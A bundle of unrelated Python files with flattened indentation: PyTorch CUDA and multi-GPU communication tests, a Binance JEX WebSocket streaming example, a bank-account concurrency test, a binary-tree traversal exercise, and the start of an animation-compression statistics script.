# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNC states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
example_binance_jex.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_jex.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
logging.getLogger("unicorn_binance_websocket_api")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
# create instance of BinanceWebSocketApiManager for Binance Jersey
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="jex.com", high_performance=True)
# set api key and secret for userData stream
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bb")
omt_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!optionMiniTicker"])
smt_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotMiniTicker"])
st_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotTicker"])
spot_markets = {'eosbtc', 'ltcbtc', 'ethbtc', 'dashbtc'}
spot_channels = {'spotTrade', 'spotMiniTicker', 'spotDepth20', 'spotDepthUpdate', 'spotTicker'}
binance_websocket_api_manager.create_stream(["spotTrade"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth10"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth20"], spot_markets)
binance_websocket_api_manager.create_stream(spot_channels, spot_markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
#binance_websocket_api_manager.print_stream_info(userdata_stream_id)
time.sleep(1)
|
bank_account_test.py
|
import sys
import threading
import time
import unittest
from bank_account import BankAccount
class BankAccountTest(unittest.TestCase):
def setUp(self):
self.account = BankAccount()
def test_newly_opened_account_has_zero_balance(self):
self.account.open()
self.assertEqual(self.account.get_balance(), 0)
def test_can_deposit_money(self):
self.account.open()
self.account.deposit(100)
self.assertEqual(self.account.get_balance(), 100)
def test_can_deposit_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.deposit(50)
self.assertEqual(self.account.get_balance(), 150)
def test_can_withdraw_money(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(50)
self.assertEqual(self.account.get_balance(), 50)
def test_can_withdraw_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(20)
self.account.withdraw(80)
self.assertEqual(self.account.get_balance(), 0)
def test_checking_balance_of_closed_account_throws_error(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.get_balance()
def test_deposit_into_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.deposit(50)
def test_withdraw_from_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_more_than_deposited(self):
self.account.open()
self.account.deposit(25)
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_negative(self):
self.account.open()
self.account.deposit(100)
with self.assertRaises(ValueError):
self.account.withdraw(-50)
def test_cannot_deposit_negative(self):
self.account.open()
with self.assertRaises(ValueError):
self.account.deposit(-50)
def test_can_handle_concurrent_transactions(self):
self.account.open()
self.account.deposit(1000)
for _ in range(10):
self.adjust_balance_concurrently()
def adjust_balance_concurrently(self):
def transact():
self.account.deposit(5)
time.sleep(0.001)
self.account.withdraw(5)
# Greatly improve the chance of an operation being interrupted
# by thread switch, thus testing synchronization effectively
try:
sys.setswitchinterval(1e-12)
except AttributeError:
# For Python 2 compatibility
sys.setcheckinterval(1)
threads = []
for _ in range(1000):
t = threading.Thread(target=transact)
threads.append(t)
t.start()
for thread in threads:
thread.join()
self.assertEqual(self.account.get_balance(), 1000)
if __name__ == '__main__':
unittest.main()
|
tree-orders.py
|
import sys, threading
class TreeOrders:
def read(self):
self.n = int(sys.stdin.readline())
self.key = [0 for i in range(self.n)]
self.left = [0 for i in range(self.n)]
self.right = [0 for i in range(self.n)]
for i in range(self.n):
[a, b, c] = map(int, sys.stdin.readline().split())
self.key[i] = a
self.left[i] = b
self.right[i] = c
# Time Complexity: O(n)
# Space Complexity: O(tree height)
def inOrderTraversal(self, v):
if v == -1:
return
if self.left[v] != -1:
self.inOrderTraversal(self.left[v])
self.result.append(self.key[v])
if self.right[v] != -1:
self.inOrderTraversal(self.right[v])
def inOrder(self):
self.result = []
self.inOrderTraversal(0)
return self.result
# Time Complexity: O(n)
# Space Complexity: O(tree height)
def preOrderTraversal(self, v):
if v == -1:
return
self.result.append(self.key[v])
if self.left[v] != -1:
self.preOrderTraversal(self.left[v])
if self.right[v] != -1:
self.preOrderTraversal(self.right[v])
def preOrder(self):
self.result = []
self.preOrderTraversal(0)
return self.result
# Time Complexity: O(n)
# Space Complexity: O(tree height)
def postOrderTraversal(self, v):
if v == -1:
return
if self.left[v] != -1:
self.postOrderTraversal(self.left[v])
if self.right[v] != -1:
self.postOrderTraversal(self.right[v])
self.result.append(self.key[v])
def postOrder(self):
self.result = []
self.postOrderTraversal(0)
return self.result
def main():
tree = TreeOrders()
tree.read()
print(" ".join(str(x) for x in tree.inOrder()))
print(" ".join(str(x) for x in tree.preOrder()))
print(" ".join(str(x) for x in tree.postOrder()))
if __name__ == '__main__':
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
threading.Thread(target=main).start()
|
acl_compressor.py
|
import multiprocessing
import numpy
import os
import platform
import queue
import threading
import time
import signal
import sys
# This script depends on a SJSON parsing package:
# https://pypi.python.org/pypi/SJSON/1.1.0
# https://shelter13.net/projects/SJSON/
# https://bitbucket.org/Anteru/sjson/src
import sjson
def parse_argv():
options = {}
options['acl'] = ""
options['stats'] = ""
options['out'] = ""
options['csv_summary'] = False
options['csv_bit_rate'] = False
options['csv_animated_size'] = False
options['csv_error'] = False
options['refresh'] = False
options['num_threads'] = 1
options['has_progress_bar'] = True
options['stat_detailed'] = False
options['stat_exhaustive'] = False
options['level'] = 'Medium'
options['print_help'] = False
for i in range(1, len(sys.argv)):
value = sys.argv[i]
# TODO: Strip trailing '/' or '\'
if value.startswith('-acl='):
options['acl'] = value[len('-acl='):].replace('"', '')
options['acl'] = os.path.expanduser(options['acl'])
if value.startswith('-stats='):
options['stats'] = value[len('-stats='):].replace('"', '')
